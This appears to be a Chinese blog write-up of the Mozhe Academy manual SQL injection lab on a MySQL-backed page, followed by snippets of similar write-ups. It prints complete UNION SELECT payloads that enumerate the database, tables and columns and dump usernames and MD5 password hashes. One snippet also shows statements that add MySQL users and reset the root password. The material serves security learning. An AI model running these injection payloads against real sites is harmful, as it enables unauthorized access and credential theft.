墨者学院SQL手工注入漏洞测试(MYSQL数据库)

最新推荐文章于 2022-04-12 00:03:33 发布
最新推荐文章于 2022-04-12 00:03:33 发布
阅读量498 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45883601/article/details/103413254
版权
本文通过墨者学院的靶场环境,详细介绍了如何检测和利用SQL手工注入漏洞。通过添加and条件和order by查询,确定了存在SQL注入,并通过联合查询逐步揭示了数据库名、表名、字段名,最终获取了用户账户和密码。
摘要由CSDN通过智能技术生成

1,打开靶场环境
在这里插入图片描述我一开始还弱智的以为这是摸着学院的账号密码登录hhh… 然而并不是
在这里插入图片描述然后发现下面有一行滚动的公告
在这里插入图片描述为啥他会滚动呢。。有点好奇,用f12查看一下源文件(虽然看不懂源码,但,,还是想看看,哈哈这就是对未知的好奇吧)
在这里插入图片描述然后用控制台发现这个有点好玩,是一个可以在页面移动的一个额不知道是啥名字
在这里插入图片描述我就i是单纯的想看看。。
然后单机公告能进入一个页面,恩,这应该就是考验手工注入漏洞测试的页面了。。
好吧,我承认是问了度娘才知道的。。
进入正题
分割线------------------------------------------------------------------------------------------
------------------ ------------------ ------------------ ------------------ ------------------
首先,在网址后加and 1=1,and 1=2检测是否存在手工sql注入漏洞
在这里插入图片描述 在这里插入图片描述加上and 1=2 时页面发生错误,这说明存在sql注入漏洞点2(sql注入说白了就是对于数据库的查询没有进行防护过滤,攻击者通过构造sql查询语句,达到查看数据库信息的一种方式。这句话转载于https://blog.csdn.net/weixin_43221560/article/details/91902122感谢小刚127.0.0.1大佬的博客分享。像我一样的0基础小白可以多利用网上的资源进行自我学习,要是能有人带,恩更好,但自学的能力培养我觉得是非常重要的,希望大家都能掌握这种终身收益的学习方法,这样我们就离不开度娘了,手动滑稽。)
然后进行order by从1开始查询,查询到5的时候发现页面发生错误,可知字段不大于5,可谓下面的手动爆破环节提供依据。
在这里插入图片描述 使用联合查询
union,确定回显位置。http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,2,3,4
在这里插入图片描述接着确定数据库
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20database(),3,4
在这里插入图片描述获取表名
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20group_concat(table_name),3,4%20from%20information_schema.TABLES%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
在这里插入图片描述然后获取字段名
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%27StormGroup_member%27
在这里插入图片描述接着就可以获取用户名、密码
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20group_concat(name),group_concat(password),4%20from%20StormGroup_member
在这里插入图片描述最后得到两个账户和密码,分别用MD5解码,
第一个错误
在这里插入图片描述第二个正确,获取密码
在这里插入图片描述

Orangegege,
关注
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3278
此题很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者学院SQL手工注入漏洞测试(MySQL数据库)
Chris_HackFromCN的博客
08-12 688
Do what you said,say what you can do 做你说过的,说你能做的 关于手工注入,网上已经有很多教程,本文讲解的是使用SQLmap工具来对该关卡进行注入,最后找到key。 首先打开靶场环境,可以看到用户登录的场景,里面包含账号和密码两个输入框。 对账号密码输入框进行注入测试,但都不成功,此时发现在登录按钮下面有一条维护通知,于是点进去.... 3. 如上图所示,进入到维护通知页面之后,发现其URL地址栏带有参数id,猜测该参数可能是注...
墨者 - SQL手工注入漏洞测试(MySQL数据库)
吃肉唐僧的博客
07-02 745
/new_list.php?id=1 and 1=1,判断id的类型值是数字类型 /new_list.php?id=1 order by 4,测出数据库有4个字段,第5个不回显 测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2275
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
sql注入(2) 墨者学院SQL手工注入漏洞测试MySQL数据库-字符型)
c10udz的博客
04-12 4169
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3956
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
[墨者]SQL手工注入漏洞测试(MySQL数据库)
ZhShy
01-13 399
第一步——判断 http://219.153.49.228:46763/new_list.php?id=1' 无法显示 http://219.153.49.228:46763/new_list.php?id=1 and 1=1 可以显示 http://219.153.49.228:46763/new_list.php?id=1 and 1=2 无法显示 满足以上条件的可能存在数字型注入。 第二步—...
墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)
吃肉唐僧的博客
07-06 642
字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了 id=tingjigonggao' order by 1-- 测试 字段个数,发现有4个 试过盲猜表,admin,manger,失败 老老实实暴库,先测回显位置 id=tingjigongga' union select '1','2','3','4' -- /new_l...
墨者学院-SQL注入漏洞测试(MySQL数据库)-解题思路
weixin_43071873的博客
07-23 222
寻找注入点。在原页面注入没有回显,所以重新寻找其他页面,如下图中通知页面 2.找回显。 3确认注入点,确定列数 4.确认回显位置 5.读库以及库版本 6.读表。 7.读列 8.读数据, status为1时登陆成功,所以要把status为1的md5值解密,即为登陆密码 9.md5解密 10.登陆拿key ...
墨者学院--SQL手工注入漏洞测试(MySQL数据库)
weixin_38131137的博客
03-01 247
一、第一步就是要找注入口 主要的方法就是 先口的注入先试试,试完之后如果没有注入口,那么就查看源代码,然后利用源代码去找href的标签 二、确定注入的类型 字符型 OR 数字型 鉴别的方法在我的收藏sql注入的文章有 确定了本文的注入为数字型 三、正式注入 1、先确定字段的数量 union select 1,2,3,4 判断字段数量为4 (超4报错) 2、看4个字段中那个字段会回显 这...
03#墨者靶场-SQL手工注入漏洞测试(MySQL数据库)
shy的博客
11-15 743
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 1.登陆墨...
墨者题解_SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_43072923的博客
04-03 301
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)题解 首先我们根据背景介绍可知: PHP代码未对用户提交的参数进行过滤,我们便可以试试SQL漏洞(虽然题目已经说明是字符型的SQL注入漏洞) 打开靶机,我们发现密码栏下面的公告可以点击,发现公告网页的URL有可疑的注入点,开始进行尝试: 第一步: 我们对 id=tingjigonggao 后面输入一个单引号 " ’ " ,发现网页返回错误,判断出存在字符型注入漏洞; 第二步: 使用order by 语句来判断列数: id=tingji
墨者--SQL手工注入漏洞测试(MySQL数据库)
YYYYYcici的博客
05-18 1485
墨者SQL手工注入漏洞测试(MySQL数据库) 解题思路: 判断注入 利用order by 判断字段数量 联合注入 1、判断注入 2、order by判断 3、联合注入 查库名 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=”库名” and 1=2 un...
墨者SQL手工注入漏洞测试(MySQL数据库)
wswr的博客
03-10 359
掌握流程,判断注入点,找数据库版本和数据库,然后表,然后字段,然后数据 右键查看源码,发现看上去能注入的页面 用 and 1=1 和 and 1=2发现注入点 然后用order by去找这个查询语句查多少个字段一直试到5发现没有页面反弹,说明只有4个 然后再用union查询 注意 id=-1 这样就回弹就显示后面不显示前面的 发现只有23回弹,说明我们一会测试值也要防2,3位置 先看数据库版本和数据库 union select 1,vers...
SQL手工注入漏洞测试(MySQL数据库)解题思路小记
Routine_limon的博客
07-05 3012
靶环境:Nginx+PHP+MySQL(题目源自墨者学院) 解题目标: 手工进行SQL注入测试,获取管理密码登录。 解题思路: ①寻找sql注入点: 尝试从登陆表单注入: 结果: 后台存在密码账号验证,无法通过此处进行注入。 通过url进行注入: 发现注入点,开始进行sql注入。 ②注入sql 查询表的字段列数: 利用order by 函数对表的字段列数进行尝试,对于列数较多的表,建议使用二...
怎么渗透验证 mysql_mysql-渗透测试
weixin_30478241的博客
02-07 301
这里以kali 中的MySQL 做演示MYSQL 的账号密码放在mysql 库中的 user 和 password给root 增加密码update mysql.user set password=password('echod') where user='root';增添mysql 用户insert into mysql.user(host,user,password) values('%','...
墨者-sql手工注入漏洞测试
最新发布
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值